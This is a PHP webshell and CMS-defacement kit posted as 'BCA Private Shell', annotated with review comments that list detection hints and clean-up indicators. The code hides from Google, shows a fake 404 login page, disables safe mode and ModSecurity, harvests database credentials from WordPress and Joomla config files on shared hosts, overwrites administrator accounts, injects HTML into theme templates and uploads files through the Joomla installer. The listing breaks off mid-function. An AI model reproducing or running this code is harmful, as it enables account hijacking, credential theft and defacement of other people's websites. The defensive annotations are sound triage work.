Kyfx

BCA Private Shell

Jan 17th, 2016
  1. <?php
// NOTE(review): this listing is a PHP webshell / CMS-defacement kit (VERSION '2.1' is defined below).
// The annotations are for triage, detection and clean-up. Several calls here (set_magic_quotes_runtime,
// get_magic_quotes_gpc) and the mysql_* / ereg_* functions used later were removed in PHP 7/8; the
// removed-function calls raise an Error that '@' does not silence, so this sample only runs on PHP 5 hosts.
  2.  
// Auth secret, expected as an MD5 hex string. It is EMPTY in this copy: the session gate further down
// (`empty($auth_pass) || ...`) therefore marks every visitor as authenticated.
  3. $auth_pass = "";
  4.  
  5. $color = "#00ff00";
  6.  
  7. $default_action = 'FilesMan';
  8.  
// '__FILE__' is quoted, so SELF_PATH holds the literal text "__FILE__", not the script's path.
  9. @define('SELF_PATH','__FILE__');
  10.  
// Crawler cloaking: any User-Agent containing "Google" receives a bare 404 and nothing else.
// Detection hint: a URL that answers 404 to crawler UAs but 200 to browser UAs.
  11. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  12.  
  13. header('HTTP/1.0 404 Not Found');
  14.  
  15. exit;
  16.  
  17. }
  18.  
  19. @session_start();
  20.  
// All PHP errors are silenced and no error log is written, so the shell leaves no php-error trail;
// the execution time limit is removed for long-running actions.
  21. @error_reporting(0);
  22.  
  23. @ini_set('error_log',NULL);
  24.  
  25. @ini_set('log_errors',0);
  26.  
  27. @ini_set('max_execution_time',0);
  28.  
  29. @set_time_limit(0);
  30.  
  31. @set_magic_quotes_runtime(0);
  32.  
  33. @define('VERSION','2.1');
  34.  
// Legacy magic_quotes handling: recursively strips the slashes PHP 5 may have added to $_POST.
// The helper is declared conditionally, so it only exists when magic_quotes_gpc is on.
  35. if( get_magic_quotes_gpc() ) {
  36.  
  37. function stripslashes_array($array) {
  38.  
  39. return is_array($array) ?array_map('stripslashes_array',$array) : stripslashes($array);
  40.  
  41. }
  42.  
  43. $_POST = stripslashes_array($_POST);
  44.  
  45. }
  46.  
  47. function printLogin() {
// Login prompt disguised as Apache's default "Not Found" page. The inline CSS renders the password box
// white-on-white so it is effectively invisible; the stray ';' before echo is harmless. The function
// never returns (exit). Detection hint: a 404 body that also contains `<form method=post>` and
// `<input type=password name=pass>`.
  48.  
  49. ;echo '
  50.  
  51. <h1>Not Found</h1>
  52.  
  53. <p>The requested URL was not found on this server.</p>
  54.  
  55. <hr>
  56.  
  57. <address>Apache Server at ';echo $_SERVER['HTTP_HOST'];echo ' Port 80</address>
  58.  
  59. <style>
  60.  
  61. input { margin:0;background-color:#fff;border:1px solid #fff; }
  62.  
  63. </style>
  64.  
  65. <center>
  66.  
  67. <form method=post>
  68.  
  69. <input type=password name=pass>
  70.  
  71. </form></center>
  72.  
  73. ';
  74.  
  75. exit;
  76.  
  77. }
  78.  
  79. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
// Session gate keyed by md5(HTTP_HOST). With $auth_pass empty the first operand short-circuits and the
// flag is set for anyone; otherwise the submitted 'pass' is MD5'd (unsalted) and compared with loose ==.
// Failure renders the fake 404 login page (printLogin) and exits. Note the brace-less nesting: the
// `else` belongs to the inner `if`.
  80.  
  81. if( empty( $auth_pass ) ||
  82.  
  83. ( isset( $_POST['pass'] ) &&( md5($_POST['pass']) == $auth_pass ) ) )
  84.  
  85. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  86.  
  87. else
  88.  
  89. printLogin();
  90.  
  91. @ini_set('error_log',NULL);
// Second, redundant copy of the error-silencing / no-time-limit settings from the file header.
  92.  
  93. @ini_set('log_errors',0);
  94.  
  95. @ini_set('max_execution_time',0);
  96.  
  97. @set_time_limit(0);
  98.  
  99. @set_magic_quotes_runtime(0);
  100.  
// Target toggles. NOTE(review): none of these $enable_* flags is read anywhere in the visible part of
// the file — the CMS probe (chkSys) hard-codes WordPress and Joomla only; treat them as dead config.
  101. $enable_wp = true;
  102.  
  103. $enable_joomla = true;
  104.  
  105. $enable_vb = false;
  106.  
  107. $enable_phpbb = false;
  108.  
  109. $enable_ipb = false;
  110.  
  111. if(isset($_SESSION['safechk'])){
// "Safe mode bypass": when the session carries 'safechk' and the host has safe_mode or disable_functions
// set, or allow_url_fopen off, the shell drops a php.ini and a .htaccess into the current directory and
// asks the operator to reload. NOTE(review): nothing in the visible file sets $_SESSION['safechk'] before
// this check, so the branch may never fire; the 'safebypass' action near the end of the file writes the
// same two files unconditionally.
// Clean-up IoCs: php.ini / .htaccess owned by the web-server user with exactly this content, and the
// response text "PHP Safe Mode ByPassed. Please Refresh This page".
  112.  
  113. if(ini_get('safe_mode') or ini_get('disable_functions') or !ini_get('allow_url_fopen')){
  114.  
// A php.ini in the script directory is only picked up by CGI/FastCGI-style SAPIs that read php.ini from
// the working directory (common on suPHP shared hosts); mod_php ignores it.
  115. $byphp = "safe_mode = Off
  116.  
  117. disable_functions =
  118.  
  119. safe_mode_gid = OFF
  120.  
  121. open_basedir = OFF
  122.  
  123. allow_url_fopen = On";
  124.  
// SecFilter* directives belong to ModSecurity 1.x. ModSecurity 2.x registers as mod_security2.c, so this
// <IfModule mod_security.c> block is skipped there and only legacy installs are affected.
  125. $byht = "<IfModule mod_security.c>
  126.  
  127. SecFilterEngine Off
  128.  
  129. SecFilterScanPOST Off
  130.  
  131. SecFilterCheckURLEncoding Off
  132.  
  133. SecFilterCheckUnicodeEncoding Off
  134.  
  135. </IfModule>";
  136.  
  137. file_put_contents("php.ini",$byphp);
  138.  
  139. file_put_contents(".htaccess",$byht);
  140.  
  141. $_SESSION['safechk'] = "done";
  142.  
  143. die("PHP Safe Mode ByPassed. Please Refresh This page");
  144.  
  145. }
  146.  
  147. }
  148.  
  function convertByte($s) {
      // Human-readable size: the largest binary unit that fits, with two decimals.
      $units = array(
          1073741824 => 'GB',
          1048576    => 'MB',
          1024       => 'KB',
      );
      foreach ($units as $divisor => $suffix) {
          if ($s >= $divisor) {
              return sprintf('%1.2f', $s / $divisor) . ' ' . $suffix;
          }
      }
      // Below 1 KiB the raw value is echoed as-is (no decimals).
      return $s . ' B';
  }
  168.  
  169. function curPageURL() {
// Rebuilds the current request URL from $_SERVER (scheme, server name, non-80 port, request URI).
// $_SERVER["HTTPS"] is read unconditionally, which raises an undefined-index notice on plain HTTP —
// masked by the error_reporting(0) above. NOTE(review): no caller appears in the visible part of the file.
  170.  
  171. $pageURL = 'http';
  172.  
  173. if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
  174.  
  175. $pageURL .= "://";
  176.  
  177. if ($_SERVER["SERVER_PORT"] != "80") {
  178.  
  179. $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
  180.  
  181. }else {
  182.  
  183. $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  184.  
  185. }
  186.  
  187. return $pageURL;
  188.  
  189. }
  190.  
  191. function chkDis($link,$str){
// Remote probe: fetches the headers of $link and, if the status line contains "200", downloads the body
// and reports whether $str occurs in it. Both strpos() results are used as booleans, so a match at
// offset 0 counts as a miss, and a failed get_headers() (false) is indexed as an array under error
// suppression. Detection hint: the PHP worker issuing HTTP requests to other vhosts on the same host
// (see chkSys for the URLs it builds).
  192.  
  193. $lol = get_headers($link,1);
  194.  
  195. if(strpos($lol[0],"200")){
  196.  
  197. $nan = file_get_contents($link);
  198.  
  199. if(strpos($nan,$str)){
  200.  
  201. return true;
  202.  
  203. }else{return false;}
  204.  
  205. }else{return false;}
  206.  
  207. }
  208.  
  209. function getDnamed(){
// Shared-host reconnaissance (cPanel-style layout): lists /var/named/*.db zone files, strips ".db", and
// maps the owning account (owner of /etc/valiases/<domain>) to the domain. A later domain overwrites an
// earlier one for the same owner; $i is incremented but never used; when nothing matches $dn is undefined
// and null is returned. Detection hint: the web-server user reading /var/named and /etc/valiases.
  210.  
  211. if(is_readable("/var/named")){
  212.  
  213. $list = scandir("/var/named");
  214.  
  215. foreach($list as $domain){
  216.  
  217. if(strpos($domain,".db")){
  218.  
  219. $i += 1;
  220.  
  221. $domain = str_replace('.db','',$domain);
  222.  
  223. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  224.  
  225. $dn[$owner['name']] = $domain;
  226.  
  227. }
  228.  
  229. }
  230.  
  231. }
  232.  
  233. return $dn;
  234.  
  235. }
  236.  
  237. function chkSys($link){
// Fingerprints a site by probing $link."wp-config.php" for the string "WordPress" and
// $link."configuration.php" for "JConfig" via chkDis(). Returns array('link'=>..., 'cms'=>...) on the
// first hit; when neither matches it falls off the end and returns null (no explicit return).
  238.  
  239. $sys_arr = array("WordPress"=>array("l"=>"wp-config.php","s"=>"WordPress"),
  240.  
  241. "Joomla"=>array("l"=>"configuration.php","s"=>"JConfig"),
  242.  
  243. );
  244.  
  245. foreach($sys_arr as $k=>$dan){
  246.  
  247. if(chkDis($link.$dan['l'],$dan['s'])){
  248.  
  249. return array('link'=>$link.$dan['l'],'cms'=>$k);
  250.  
  251. }
  252.  
  253. }
  254.  
  255. }
  256.  
  257. function EloFind($str,$start,$end){
// Returns the text between the first occurrence of $start and the next $end after it. If $start is
// absent, strpos() yields false and the arithmetic treats it as 0; if $end is absent, substr() gets a
// false length and returns "". $len is computed but unused. Used throughout the file to pull database
// credentials out of CMS config files and hidden form values out of HTML.
  258.  
  259. $len = strlen($str);
  260.  
  261. $start_pos = (strpos($str,$start) +strlen($start));
  262.  
  263. $str = substr($str,$start_pos);
  264.  
  265. $end_pos = strpos($str,$end);
  266.  
  267. $str = substr($str,0,$end_pos);
  268.  
  269. return $str;
  270.  
  271. }
  272.  
  273. function GetPage($url,$cookie,$post = null,$head = true) {
// cURL wrapper behind every outbound request in this file: follows redirects, returns the body (with
// response headers when $head is true), persists cookies in the file $cookie, forwards the visiting
// operator's User-Agent, and switches to POST when $post is non-null. TLS verification is left ON
// (VERIFYPEER true, VERIFYHOST 2). cURL errors are echoed straight into the response.
// Detection hint: the web server making HTTP(S) requests to its own vhosts, and cookie-jar files under a
// "cookie/" directory next to the shell (path built by the callers).
  274.  
  275. $ch = curl_init();
  276.  
  277. curl_setopt($ch,CURLOPT_URL,$url);
  278.  
  279. curl_setopt($ch,CURLOPT_HEADER,$head);
  280.  
  281. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  282.  
  283. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  284.  
  285. curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,true);
  286.  
  287. curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2);
  288.  
  289. curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
  290.  
  291. curl_setopt($ch,CURLOPT_COOKIEFILE,$cookie);
  292.  
  293. curl_setopt($ch,CURLOPT_COOKIEJAR,$cookie);
  294.  
// PHP keywords are case-insensitive, so the capitalised `If` is valid.
  295. If ($post != NULL){
  296.  
  297. curl_setopt($ch,CURLOPT_POST,1);
  298.  
  299. curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
  300.  
  301. }
  302.  
  303. $urlPage = curl_exec($ch);
  304.  
  305. if(curl_errno($ch)){
  306.  
  307. echo curl_error($ch);
  308.  
  309. }
  310.  
  311. curl_close($ch);
  312.  
  313. return($urlPage);
  314.  
  315. }
  316.  
  317. function throwErr($str){
// Error path of the shell's JSON protocol: emits {"status":"error","msg":"..."} and terminates.
// The success paths elsewhere emit {"site":"...","status":"success"} — both shapes are useful
// response-body signatures for a PHP file that should not be speaking JSON.
  318.  
  319. $arr = array("status"=>"error","msg"=>$str);
  320.  
  321. die(json_encode($arr));
  322.  
  323. }
  324.  
  325. function add2file($file,$str){
// Appends $str to $file unless the file already contains it (strpos() truthiness: a match at offset 0
// is treated as absent, so such an entry is appended again). Used to keep result lists — wp_site.txt,
// wp_index.txt, jm_site.txt, jm_index.txt in the callers — whose presence beside the shell is a
// clean-up IoC and a record of which sites were touched.
  326.  
  327. if(file_exists($file)){
  328.  
  329. $do = file_get_contents($file);
  330.  
  331. if(!strpos($do,$str)){
  332.  
  333. file_put_contents($file,$str,FILE_APPEND);
  334.  
  335. }
  336.  
  337. }else{
  338.  
  339. file_put_contents($file,$str,FILE_APPEND);
  340.  
  341. }
  342.  
  343. }
  344.  
  345. function doXploitWP($cnf,$html,$npass){
// WordPress account takeover + defacement, driven by a readable wp-config.php ($cnf):
//  1. extracts DB_USER / DB_PASSWORD / DB_NAME / table_prefix and connects to MySQL on localhost;
//  2. rewrites user ID 1 to login 'admin' with a fixed MD5-crypt hash (the login POST that follows uses
//     pwd=123456789, presumably the password that hash encodes);
//  3. logs in over HTTP with cookie jar cookie/<md5($cnf)>.txt and overwrites the theme files selected
//     via $_POST (index.php, home.php, 404.php, archive.php, comment.php) with $html through
//     wp-admin/theme-editor.php;
//  4. changes user 1's profile to display_name "BdBlackHat", email xxbox1971@yahoo.com, password $npass.
// Clean-up IoCs: wp_users row 1 carrying that hash / display name / email; login.txt, wp_site.txt,
// wp_index.txt and cookie/*.txt beside the shell; theme files containing the injected payload.
// Uses the mysql_* extension (removed in PHP 7). Every failure path terminates via throwErr().
  346.  
  347. $success = false;
  348.  
  349. $str = file_get_contents($cnf);
  350.  
  351. if(preg_match('%DB_USER%',$str)){
  352.  
  353. $username=EloFind($str,"define('DB_USER', '","');");
  354.  
  355. $password=EloFind($str,"define('DB_PASSWORD', '","');");
  356.  
  357. $dbname=EloFind($str,"define('DB_NAME', '","');");
  358.  
  359. $prefix=EloFind($str,"table_prefix = '","'");
  360.  
  361. $link=mysql_connect("localhost",$username,$password) ;
  362.  
  363. if ($link) {
  364.  
  365. mysql_select_db($dbname,$link) ;
  366.  
// Primary-admin overwrite. The hard-coded hash on the next line is a stable database IoC.
  367. $req1 =mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '$1$42REgxSR$.tLV4PSbQmCKsisyCSyhq.' WHERE `ID` =1 LIMIT 1 ;");
  368.  
  369. $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
  370.  
  371. $data = mysql_fetch_array($req);
  372.  
  373. $site_url=$data["option_value"];
  374.  
  375. }else{
  376.  
  377. throwErr("Mysql Fail");
  378.  
  379. }
  380.  
  381. $status['site'] = $site_url;
  382.  
// Per-target cookie jar; the "cookie/" directory is never created here, so it must already exist.
  383. $cookie = 'cookie/'.md5($cnf).'.txt';
  384.  
  385. @unlink($cookie);
  386.  
  387. $logged_in = true;
  388.  
  389. $url = $site_url."/wp-login.php";
  390.  
  391. $postme = 'log=admin&pwd=123456789&rememberme=forever&wp-submit=Log In&testcookie=1';
  392.  
  393. $logme = GetPage($url,$cookie,$postme);
  394.  
// On login failure the full HTTP response is dumped to login.txt (forensic artefact).
  395. if(!preg_match('%logout%',$logme)){
  396.  
  397. file_put_contents("login.txt",$site_url.$logme);
  398.  
  399. throwErr("Login Error");
  400.  
  401. }
  402.  
// $logged_in is always true at this point (set unconditionally above), so the guard is vacuous.
  403. if($logged_in){
  404.  
  405. $url = $site_url."/wp-admin/theme-editor.php";
  406.  
  407. $themeditor = GetPage($url,$cookie,null);
  408.  
  409. $nola = explode(Chr(10),$themeditor);
  410.  
// Collect the theme-editor links for the five editable file names matched by the regex.
  411. foreach($nola as $nline){
  412.  
  413. if(preg_match('%theme-editor\.php\?file=%',$nline) &&preg_match('%\((index\.php|home\.php|404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
  414.  
  415. $modify[EloFind($nline,'(',')')] = EloFind($nline,'<a href="','"');
  416.  
  417. }
  418.  
  419. }
  420.  
  421. if(is_array($modify)){
  422.  
  423. foreach($modify as $met=>$indfile){
  424.  
// Operator toggles arrive as $_POST['n<file with . replaced by _>'] == "on", e.g. nindex_php.
  425. $nri = str_replace('.','_',$met);
  426.  
  427. $nri = "n".$nri;
  428.  
  429. if($_POST[$nri] == "on"&&(!$success OR $met == "index.php")){
  430.  
  431. $indfile =str_replace("&amp;","&",$indfile);
  432.  
  433. $url = trim($site_url."/wp-admin/".$indfile);
  434.  
  435. $themepage = GetPage($url,$cookie,"");
  436.  
  437. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  438.  
  439. $_file = EloFind($themepage,'name="file" value="','"');
  440.  
  441. $nfile = explode('themes',$_file);
  442.  
  443. $jfile = $site_url."/wp-content/themes".end($nfile);
  444.  
  445. $url = $site_url."/wp-admin/theme-editor.php";
  446.  
  447. $postme = "newcontent=".urlencode($html)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
  448.  
  449. $themedied = GetPage($url,$cookie,$postme);
  450.  
// Success is judged by WordPress's "updated" notice; the defaced file URL is recorded in wp_site.txt.
  451. if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
  452.  
  453. if(!$success){
  454.  
  455. add2file("wp_site.txt",$jfile.Chr(10));
  456.  
  457. }
  458.  
  459. $success = true;
  460.  
  461. if($met == "index.php"){
  462.  
  463. add2file("wp_index.txt",$site_url.Chr(10));
  464.  
  465. }
  466.  
  467. }else{
  468.  
  469. $error = true;
  470.  
  471. }
  472.  
  473. }
  474.  
  475. }
  476.  
  477. }else{
  478.  
  479. throwErr("No file found");
  480.  
  481. }
  482.  
// Second stage: profile update of user 1. The hard-coded display_name and email are stable IoCs.
  483. if($success){
  484.  
  485. $url = trim($site_url."/wp-admin/profile.php");
  486.  
  487. $themepage = GetPage($url,$cookie,"");
  488.  
  489. $_wpnonce = EloFind($themepage,'name="_wpnonce" value="','"');
  490.  
  491. $url = trim($site_url."/wp-admin/profile.php");
  492.  
  493. $postme = "_wpnonce=".$_wpnonce."&_wp_http_referer=%2Fwp-admin%2Fprofile.php%3Fupdated%3Dtrue&from=profile&checkuser_id=1&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=admin&display_name=BdBlackHat&email=xxbox1971@yahoo.com&url=&aim=&yim=&jabber=&description=&pass1=".$npass."&pass2=".$npass."&action=update&user_id=1&submit=Update+Profile";
  494.  
  495. $themepage = GetPage($url,$cookie,$postme);
  496.  
  497. $status['status'] = "success";
  498.  
  499. die(json_encode($status));
  500.  
  501. }
  502.  
  503. else{
  504.  
  505. if($error){
  506.  
  507. throwErr("Could't Update the file");
  508.  
  509. }else{
  510.  
  511. throwErr("Selected file not found");
  512.  
  513. }
  514.  
  515. }
  516.  
  517. }
  518.  
  519. }else{
  520.  
  521. throwErr("Config not found");
  522.  
  523. }
  524.  
// Unreachable in practice: every branch above ends in die()/throwErr().
  525. return true;
  526.  
  527. }
  528.  
  529. function doXploitJM($cnf,$html,$npass){
// Joomla account takeover + defacement for both config styles seen on the page ("JConfig" and legacy
// "mosConfig"), driven by a readable configuration.php ($cnf):
//  - extracts DB user / password / db / prefix; the site URL comes from $_POST['domain'] or, failing
//    that, the domain part of the config's mailfrom address;
//  - `UPDATE <prefix>users SET username='admin', block='0', password=md5($npass)` carries NO WHERE
//    clause, so every account is renamed and re-passworded (IoC: all user rows named 'admin');
//  - logs in to /administrator/ with cookie jar cookie/<md5($cnf)>.txt; a successful SELECT on
//    <prefix>extensions selects the upper (com_templates source.edit) flow, otherwise the lower
//    (templates_menu / index2.php) flow; joomlaCom() may first upload bca.html from the shell's
//    directory through com_installer; finally the active template's index.php is replaced with $html.
// Clean-up IoCs: jm_login1.5<md5>.txt, jm_login1.6<md5>.txt and jmupd.txt (failure dumps), jm_site.txt,
// jm_index.txt, cookie/*.txt and bca.html beside the shell; <site>/tmp/bca.html; modified
// templates/<name>/index.php. joomlaCom() is declared inside this function and therefore only exists
// after doXploitJM() has started executing. Uses mysql_* and ereg_replace (both removed in PHP 7).
  530.  
  531. function joomlaCom($site_url,$cookie,$site){
// Optional extension "install" step, enabled by $_POST['com_install'] == "on": posts bca.html from the
// current directory as an install package; an "Unknown Archive Type" reply is treated as success and
// <site>/tmp/bca.html is recorded in jm_site.txt. Returns false on a failed upload, true when skipped.
  532.  
  533. if($_POST['com_install'] == "on"){
  534.  
  535. $url = $site_url ."/index.php?option=com_installer";
  536.  
  537. $compage = GetPage($url,$cookie);
  538.  
// Joomla's per-session form token is a hidden input named by a random word with value "1".
  539. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$compage,$dhash);
  540.  
  541. $hash = $dhash[1];
  542.  
  543. preg_match_all('#value="/(.*?)"#s',$compage,$path);
  544.  
// Only the last matched path survives the loop.
  545. foreach($path[0] as $pathx){
  546.  
  547. $pathx=ereg_replace('value="','',$pathx);
  548.  
  549. $pathx=ereg_replace('"','',$pathx);
  550.  
  551. }
  552.  
  553. $dir = getcwd()."/bca.html";
  554.  
  555. $postme = array("install_package"=>"@".$dir ,"install_directory"=>"".$pathx."","install_url"=>"http://","type"=>"","installtype"=>"upload","task"=>"doInstall","option"=>"com_installer","".$hash.""=>"1");
  556.  
  557. $url = $site_url ."/index.php?option=com_installer";
  558.  
  559. $com_shell = GetPage($url,$cookie,$postme);
  560.  
  561. if(preg_match('#<li>Unknown Archive Type</li>#s',$com_shell)){
  562.  
  563. add2file("jm_site.txt",$site."/tmp/bca.html".Chr(10));
  564.  
  565. $status['site'] = $site."/tmp/bca.html";
  566.  
  567. $status['status'] = "success";
  568.  
  569. die(json_encode($status));
  570.  
  571. }else{
  572.  
  573. return false;
  574.  
  575. }
  576.  
  577. }
  578.  
  579. return true;
  580.  
  581. }
  582.  
  583. $str = file_get_contents($cnf);
  584.  
  585. if(preg_match('%(JConfig|mosConfig)%',$str)){
  586.  
// Credential extraction, JConfig variant.
  587. if(preg_match('%JConfig%',$str)){
  588.  
  589. $username=EloFind($str,"\$user = '","'");
  590.  
  591. $password=EloFind($str,"\$password = '","'");
  592.  
  593. $dbname=EloFind($str,"\$db = '","'");
  594.  
  595. $prefix=EloFind($str,"\$dbprefix = '","'");
  596.  
  597. $pwd = md5($npass);
  598.  
  599. if($_POST['domain'] != "..."){
  600.  
  601. $site_url = $_POST['domain'];
  602.  
  603. $site_url = "http://".$site_url;
  604.  
  605. }else{
  606.  
  607. $mailto = EloFind($str,"\$mailfrom = '","'");
  608.  
  609. $siteul = explode('@',$mailto);
  610.  
  611. $site_url = "http://".$siteul[1];
  612.  
  613. }
  614.  
// Credential extraction, legacy mosConfig variant (same shape, different variable names).
  615. }elseif(preg_match('%mosConfig%',$str)){
  616.  
  617. $username=EloFind($str,"\$mosConfig_user = '","'");
  618.  
  619. $password=EloFind($str,"\$mosConfig_password = '","'");
  620.  
  621. $dbname=EloFind($str,"\$mosConfig_db = '","'");
  622.  
  623. $prefix=EloFind($str,"\$mosConfig_dbprefix = '","'");
  624.  
  625. $pwd = md5($npass);
  626.  
  627. if($_POST['domain'] != "..."){
  628.  
  629. $site_url = $_POST['domain'];
  630.  
  631. $site_url = "http://".$site_url;
  632.  
  633. }else{
  634.  
  635. $mailto = EloFind($str,"\$mosConfig_mailfrom = '","'");
  636.  
  637. $siteul = explode('@',$mailto);
  638.  
  639. $site_url = "http://".$siteul[1];
  640.  
  641. }
  642.  
  643. }
  644.  
  645. $site = $site_url;
  646.  
  647. $site_url = $site_url."/administrator/";
  648.  
  649. $cookie = 'cookie/'.md5($cnf).'.txt';
  650.  
  651. @unlink($cookie);
  652.  
  653. $link=mysql_connect("localhost",$username,$password) ;
  654.  
  655. if ($link) {
  656.  
  657. mysql_select_db($dbname,$link);
  658.  
// No WHERE clause: every row of the users table is renamed to 'admin', unblocked and re-passworded.
  659. $changepass = mysql_query("UPDATE ".$prefix."users SET username ='admin' , block ='0' , password = '".$pwd."'");
  660.  
// Branch selector: whether an `extensions` table exists under this prefix.
  661. $doit =mysql_query("SELECT * from `".$prefix."extensions` ");
  662.  
  663. if($doit){
  664.  
// Template choice: $_POST['ignore_def'] == "on" prefers a non-default site template, else the default.
  665. if($_POST['ignore_def'] == "on"){
  666.  
  667. $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='0'");
  668.  
  669. $data = mysql_fetch_array($req);
  670.  
  671. $template_name=$data["template"];
  672.  
  673. if(strlen($template_name) <1){
  674.  
  675. $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  676.  
  677. $data = mysql_fetch_array($req);
  678.  
  679. $template_name=$data["template"];
  680.  
  681. }
  682.  
  683. }
  684.  
  685. else{
  686.  
  687. $req =mysql_query("SELECT * from `".$prefix."template_styles` WHERE client_id='0' and home='1'");
  688.  
  689. $data = mysql_fetch_array($req);
  690.  
  691. $template_name=$data["template"];
  692.  
  693. }
  694.  
  695. $req =mysql_query("SELECT * from `".$prefix."extensions` WHERE name='".$template_name."'");
  696.  
  697. $data = mysql_fetch_array($req);
  698.  
  699. $template_id=$data["extension_id"];
  700.  
  701. $url = $site_url ."index.php";
  702.  
  703. $login_page = GetPage($url,$cookie);
  704.  
  705. $rhash = EloFind($login_page,'type="hidden" name="return" value="','"');
  706.  
  707. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  708.  
  709. $hash = $dhash[1];
  710.  
  711. $url = $site_url ."index.php";
  712.  
  713. $postme = "username=admin&passwd=".$npass."&usrname=admin&pass=".$npass."&submit=Login&option=com_login&lang=en-GB&task=login&return=".$rhash."&".$hash."=1";
  714.  
  715. $logginin = GetPage($url,$cookie,$postme);
  716.  
  717. if(preg_match('%logout|index2\.php%',$logginin)){
  718.  
  719. $logged_in = true;
  720.  
  721. }
  722.  
// Login failure dump (forensic artefact): jm_login1.6<md5 of admin URL>.txt.
  723. if(!$logged_in){
  724.  
  725. file_put_contents("jm_login1.6".md5($site_url).".txt",$site_url.$logginin);
  726.  
  727. throwErr("Login Error");
  728.  
  729. }
  730.  
  731. if($logged_in){
  732.  
  733. joomlaCom($site_url,$cookie,$site);
  734.  
  735. $url=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
  736.  
  737. $themepage = GetPage($url,$cookie);
  738.  
  739. if(preg_match('%type=\"hidden\" name=\"\w+\" value=\"1\"%',$themepage)){
  740.  
  741. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  742.  
  743. $hash = $dhash[1];
  744.  
  745. $url = $site_url."/index.php?option=com_templates&layout=edit";
  746.  
  747. $postme = "jform[source]=".urlencode($html)."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hash."=1&task=source.save";
  748.  
  749. $themeedit = GetPage($url,$cookie,$postme);
  750.  
// Success is judged by Joomla's "message" notice; the defaced template path is logged to jm_site.txt.
  751. if(preg_match('%class=\"message message\"%',$themeedit)){
  752.  
  753. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  754.  
  755. add2file("jm_index.txt",$site.Chr(10));
  756.  
  757. if($_POST['ignore_def'] == "on"){
  758.  
  759. $status['site'] = $site."/templates/".$template_name."/index.php";
  760.  
  761. }else{
  762.  
  763. $status['site'] = $site;
  764.  
  765. }
  766.  
  767. $status['status'] = "success";
  768.  
  769. die(json_encode($status));
  770.  
  771. }
  772.  
  773. else{
  774.  
  775. throwErr("Update failed");
  776.  
  777. }
  778.  
  779. }
  780.  
  781. else{
  782.  
  783. throwErr("Index not found");
  784.  
  785. }
  786.  
  787. }
  788.  
// Lower flow: no `extensions` table, template name read from templates_menu instead.
  789. }else{
  790.  
  791. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
  792.  
  793. $data = mysql_fetch_array($req);
  794.  
  795. $template_name=$data["template"];
  796.  
  797. $url = $site_url ."index.php";
  798.  
  799. $login_page = GetPage($url,$cookie);
  800.  
  801. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$login_page,$dhash);
  802.  
  803. $hash = $dhash[1];
  804.  
  805. $postme = "username=admin&passwd=".$npass."&usrname=admin&lang=en-GB&pass=".$npass."&submit=Login&option=com_login&task=login&".$hash."=1";
  806.  
  807. $url = $site_url ."index.php";
  808.  
  809. $logginin = GetPage($url,$cookie,$postme);
  810.  
  811. if(preg_match('%logout|index2\.php%',$logginin)){
  812.  
  813. $logged_in = true;
  814.  
  815. }
  816.  
// Login failure dump (forensic artefact): jm_login1.5<md5 of admin URL>.txt.
  817. if(!$logged_in){
  818.  
  819. file_put_contents("jm_login1.5".md5($site_url).".txt",$site_url.$logginin);
  820.  
  821. throwErr("Login Error");
  822.  
  823. }
  824.  
  825. if($logged_in){
  826.  
  827. joomlaCom($site_url,$cookie,$site);
  828.  
// Two sub-flows depending on whether the backend answered with index2.php (older admin) or index.php.
  829. if(preg_match('%index2\.php%',$logginin)){
  830.  
  831. $url = $site_url ."index2.php";
  832.  
  833. $logginin = GetPage($url,$cookie);
  834.  
  835. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$logginin,$dhash);
  836.  
  837. $hash = $dhash[1];
  838.  
  839. $url = $site_url ."/index2.php";
  840.  
  841. $postme = "doPreview=on&cid%5B%5D=".$template_name."&limit=30&limitstart=0&option=com_templates&task=edit_source&boxchecked=1&hidemainmenu=1&client=0&".$hash."=1";
  842.  
  843. $themepage = GetPage($url,$cookie,$postme);
  844.  
  845. if(preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage)){
  846.  
  847. preg_match('%type=\"hidden\" name=\"(\w+)\" value=\"1\"%',$themepage,$dhash);
  848.  
  849. $hash = $dhash[1];
  850.  
  851. $url=$site_url."/index2.php";
  852.  
  853. $postme = "filecontent=".urlencode($html)."&template=".$template_name."&option=com_templates&task=save_source&client=0&".$hash."=1";
  854.  
  855. $themeedit = GetPage($url,$cookie,$postme);
  856.  
  857. if(preg_match('%Template Manager%',$themeedit)){
  858.  
  859. add2file("jm_site.txt",$site."/templates/".$template_name."/index.php".Chr(10));
  860.  
